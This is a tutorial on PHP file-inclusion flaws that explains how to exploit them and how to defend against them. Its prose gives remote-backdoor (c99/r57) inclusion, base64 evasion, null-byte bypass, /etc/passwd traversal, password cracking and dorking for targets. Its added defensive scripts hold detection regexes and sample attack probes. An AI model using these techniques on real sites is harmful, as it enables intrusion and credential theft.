PHP Include flaw, what is it and how to protect against it?


Last updated: January 1, 2023

We have already talked in previous tutorials about the upload flaw and the XSS flaw. Today I will present the PHP Include flaw, which is certainly the most famous PHP flaw in the world of websites; it stems from a programming error made by a developer who cares little about security.

We will see in detail how to exploit this flaw and of course how to protect yourself from it.

And, no, the article is not going to self-destruct in 5 seconds :), so take the time to read it to learn more about the PHP Include flaw.

PHP Include: what is it?

This function, as its name suggests, lets you include one page inside another. It is used like this:



If all your pages require the mysql.php page, which contains the database connection information, it should be included in each of your pages rather than retyping the contents of mysql.php in all of them.

The PHP include function lets you have a single mysql.php page which all the pages of your site include (the same goes for the menu, header and footer).

How does PHP Include work?

Imagine we have an index.php page with the following code:

if (isset($_GET['page'])) { // check if the _GET variable exists
    include($_GET['page']); // vulnerable: the file name comes straight from the URL
}

If we type: http://[site]/index.php?page=astuces.php

This piece of code will include (and run) the "astuces.php" page. So far, nothing very complicated.
Now what will happen if I type a URL whose page parameter points at a remote site, such as Google's home page?

Then the Google page will run and be displayed through our server! Imagine that this page is in fact a backdoor like c99.php. We can then take control of the hosting server: list all the files on the server, edit them, create them, access the database, etc.

Detecting the presence of a PHP Include flaw

To detect a PHP include flaw on a website, you just have to test all the possible parameters of a URL and observe the result. The goal is to make the website fail when it tries to include a page that does not exist.
If a URL is vulnerable, we should get a PHP warning like this:

  • Warning: main([PARAMETRE_INCORRECT]): failed to open stream: No such file or directory in [URL_DE_LA_PAGE].php on line [NUMERO_DE_LIGNE]
  • Warning: main(): Failed opening '[PARAMETRE_INCORRECT]' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in [URL_DE_LA_PAGE].php on line [NUMERO_DE_LIGNE]

Type one of the two warnings into a search engine and you will find what you are looking for! 😀 You can still try, but be aware that it is illegal!
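From the site operator's side, those two warnings are the thing to watch for. In production they should never be displayed to visitors (display_errors=Off, log_errors=On), which means they end up in the PHP error log, next to the access log where the probing requests themselves appear. The following command-line script is an added example, not part of the original article: it scans constructed samples of both logs for remote-include, directory-traversal and null-byte attempts on a page parameter, and for the include() warnings above. The parameter name page is the one the article uses; the IP addresses, file names and paths are made up for the demonstration, and the warning patterns cover both the old "main(...)" wording and the "include(...)" wording current PHP releases use.

```php
<?php
// Added example (not from the original article): scan an access log and a
// PHP error log for signs that a ?page= include parameter is being probed.
// All log lines below are constructed samples; IPs and paths are made up.

declare(strict_types=1);

// Request patterns that indicate an include-parameter probe (URL-encoded
// variants such as %2e%2e%2f are covered as well).
const REQUEST_SIGNATURES = [
    'remote include' => '~[?&]page=(?:https?|ftp)(?:%3a|:)~i',
    'path traversal' => '~[?&]page=[^ "]*(?:\.\./|\.\.%2f|%2e%2e)~i',
    'null byte'      => '~[?&]page=[^ "]*%00~i',
];

// PHP warnings produced when include() is fed a file that does not exist.
// Old PHP releases report "main(...)", current ones "include(...)".
const ERROR_SIGNATURES = [
    'failed to open stream' => '~(?:main|include|require)(?:_once)?\(.*\): failed to open stream~i',
    'failed inclusion'      => "~Failed opening '.*' for inclusion~i",
];

/**
 * Run every signature over every line.
 * Returns ['label' => ['line', ...], ...] with only the labels that matched.
 */
function scanLog(array $lines, array $signatures): array
{
    $hits = [];
    foreach ($lines as $line) {
        foreach ($signatures as $label => $regex) {
            if (preg_match($regex, $line) === 1) {
                $hits[$label][] = trim($line);
            }
        }
    }
    return $hits;
}

/** Count suspicious matches per client IP (first field of a combined-format line). */
function suspectsByIp(array $hits): array
{
    $counts = [];
    foreach ($hits as $lines) {
        foreach ($lines as $line) {
            if (preg_match('~^(\S+)~', $line, $m) === 1) {
                $counts[$m[1]] = ($counts[$m[1]] ?? 0) + 1;
            }
        }
    }
    arsort($counts);
    return $counts;
}

// Constructed samples: a combined-format access log and a PHP error log.
$accessLog = [
    '203.0.113.5 - - [01/Jan/2023:10:00:01 +0000] "GET /index.php?page=astuces.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2023:10:00:02 +0000] "GET /index.php?page=http://203.0.113.77/shell.txt HTTP/1.1" 200 8192',
    '203.0.113.9 - - [01/Jan/2023:10:00:03 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1420',
    '203.0.113.9 - - [01/Jan/2023:10:00:04 +0000] "GET /index.php?page=..%2f..%2fetc%2fpasswd%00 HTTP/1.1" 200 1420',
    '198.51.100.2 - - [01/Jan/2023:10:00:05 +0000] "GET /index.php?page=photos.php HTTP/1.1" 200 600',
];
$errorLog = [
    '[01-Jan-2023 10:00:06 UTC] PHP Warning:  include(doesnotexist.php): failed to open stream: No such file or directory in /var/www/index.php on line 3',
    "[01-Jan-2023 10:00:06 UTC] PHP Warning:  include(): Failed opening 'doesnotexist.php' for inclusion (include_path='.:/usr/share/php') in /var/www/index.php on line 3",
    '[01-Jan-2023 10:00:07 UTC] PHP Notice:  Undefined variable: foo in /var/www/other.php on line 9',
];

$requestHits = scanLog($accessLog, REQUEST_SIGNATURES);
$errorHits   = scanLog($errorLog, ERROR_SIGNATURES);

foreach (['access log' => $requestHits, 'error log' => $errorHits] as $source => $hits) {
    echo "== $source ==\n";
    foreach ($hits as $label => $lines) {
        echo "$label: " . count($lines) . " line(s)\n";
        foreach ($lines as $line) {
            echo "  $line\n";
        }
    }
}

echo "== suspicious matches per client ==\n";
foreach (suspectsByIp($requestHits) as $ip => $n) {
    echo "$ip: $n\n";
}
```

Run it with php scan_includes.php (any file name will do). On the samples, the first and last access-log lines are ordinary page requests and produce nothing, the three requests from 203.0.113.9 are each flagged (the URL-encoded one under both "path traversal" and "null byte"), and the two include() warnings are picked out of the error log while the unrelated notice is ignored. To use it on real logs, replace the two arrays with file() calls on the log paths of your server.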

How to exploit this flaw?

Exploit the include flaw remotely

First of all, you must have a PHP script (backdoor) ready to use.

For that, search Google for a specific backdoor such as r57, c99, c100 or myshell. It is preferable to base64-encode it so that it is not detected.

Suppose you have found the PHP Include flaw on a PHP website, and it allows any page to be included. Now all you have to do is place your backdoor on an FTP server or a free server not running PHP.

Whatever solution you choose, you can therefore call the vulnerable page in this way:
index.php?page=http://
(if it is on an FTP server, obviously replace http:// by ftp:// and give the login/password in the usual way).

And you will see your backdoor display as follows:

(Screenshot: backdoor interface)

Sometimes, we come across a vulnerable page but with a code different from the one we saw in the previous paragraph, for example:

include($_GET['page'] . ".php");

Here the extension ".php" is automatically appended to the variable. This turns our backdoor.php file into backdoor.php.php, which will not run on the vulnerable server.

So what?

There is a very simple way to get around this filter: the null byte technique. It consists of placing an ASCII zero at the end of our URL. We therefore have to include:
index.php?page=http://


The include() function is handled by code written in C, and in C the end of a character string is marked by a null byte (\x00 in the usual notation). That is why our string (porte-derobee.php%00.php) gets truncated when the %00 character is reached!

The local include flaw

So far we've only tried to include a remote backdoor. But be aware that it is quite possible, with this flaw, to execute a file located on the vulnerable server! And besides, it is sometimes the only possibility, because some protections disable the ability to include code located on another server.

So we can display any page of the site through the index in the same way, and by the same means navigate through all the directories of the site, and even those of the server if permissions (chmod) have not been restricted.

In practice, it is quite simple: we try to guess in which directory an interesting file like .htpasswd is located, by successively testing parameters like "../.htpasswd", "../../.htpasswd" or "../dossier/.htpasswd".

Or we can go back to the root of the server and then descend into the directory that interests us until we find a sensitive file, for example passwd.

Once the password files are recovered, you can crack them with a suitable program like John The Ripper or Cain.

Here are some other files that may be interesting to look at, even if some of them (like /etc/shadow) are only readable by the root user.

/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user

Protect yourself from the Include vulnerability

The best way to protect yourself from the PHP include flaw is:

  • Comparing the parameter against each page of your site explicitly; it is certainly long, but there is nothing better:
    if ($page == "tips") { include("tips.php"); }
    elseif ($page == "photos") { include("photos.php"); }
    else { include("index.php"); }
  • In PHP 4, set the allow_url_fopen directive to Off. It allows files located on another server to be read;
  • In PHP 5, set the allow_url_include directive to Off. This is an improvement over PHP 4 because it distinguishes reading a remote file from including it.
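Two caveats are worth keeping in mind with that list. allow_url_include=Off only stops the remote variant; the local include with "../" still works, so the explicit comparison per page is what actually closes the flaw. And the null byte trick described earlier stopped working in PHP 5.3.4, which rejects paths containing a null byte, but with an allowlist the question never arises, because nothing taken from the URL is ever used as a path. The script below is an added example, not the article's code, that generalises the per-page if/elseif into a lookup table and adds a realpath() check as defence in depth; it assumes PHP 8 or later, and the page file names and the temporary page directory are made up for the demonstration.

```php
<?php
// Added example (not the article's own code): replacing include($_GET['page'])
// with an allowlist lookup. File names and the base directory are assumptions
// made for this demonstration. Requires PHP 8+ (mixed, str_starts_with).

declare(strict_types=1);

// The only pages that may be requested. The request supplies a key; the path
// that reaches include() always comes from this table, never from the user.
const PAGES = [
    'index'  => 'index.php',
    'tips'   => 'tips.php',
    'photos' => 'photos.php',
];

/**
 * Map the ?page= value to an absolute file path inside $baseDir.
 * Returns null for anything not on the allowlist, so remote URLs, "../"
 * sequences and null bytes are never used as a path at all.
 */
function resolvePage(mixed $requested, string $baseDir): ?string
{
    // A missing parameter means the default page; an array (page[]=x) or a
    // non-allowlisted string is rejected outright.
    if ($requested === null || $requested === '') {
        $requested = 'index';
    }
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // Defence in depth: the resolved file must still sit under $baseDir.
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

// --- Demonstration with a temporary page directory (php hardened_include.php)
$pagesDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . getmypid();
mkdir($pagesDir);
foreach (PAGES as $file) {
    // Each constructed page just announces that it was loaded.
    file_put_contents("$pagesDir/$file", "<?php echo \"loaded $file\\n\";");
}

$probes = [
    'tips',                         // legitimate request
    'photos',                       // legitimate request
    null,                           // no parameter: default page
    'http://203.0.113.77/c99.txt',  // remote include attempt
    '../../../../etc/passwd',       // local file inclusion attempt
    "tips\0.php",                   // null byte truncation attempt
    ['tips'],                       // page[]=tips
];
foreach ($probes as $probe) {
    $label = is_array($probe) ? 'array' : var_export($probe, true);
    $path = resolvePage($probe, $pagesDir);
    if ($path === null) {
        echo str_pad($label, 32) . "-> rejected\n";
        continue;
    }
    echo str_pad($label, 32) . "-> ";
    include $path; // only an allowlisted, in-directory file can get here
}

// Clean up the temporary files.
array_map('unlink', glob("$pagesDir/*.php"));
rmdir($pagesDir);
```

In a real page the front part would be: $path = resolvePage($_GET['page'] ?? null, __DIR__ . '/pages'); then a 404 when $path is null and include $path otherwise. Running the demonstration shows the three legitimate probes loading their page and the four hostile ones rejected before include() is ever reached. The realpath() comparison is not what rejects them (the allowlist already did); it is there so that a later mistake in the table, such as an entry pointing outside the page directory, is caught as well.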

As in all articles, I hope that I have met your expectations and that I have been able to bring you something new through this post. I also hope that all webmasters are aware of the danger of this flaw.

EL JAOUARI is an author and trainer. Passionate about IT security and new technologies. His tutorials have helped many people to better master today's computer tools.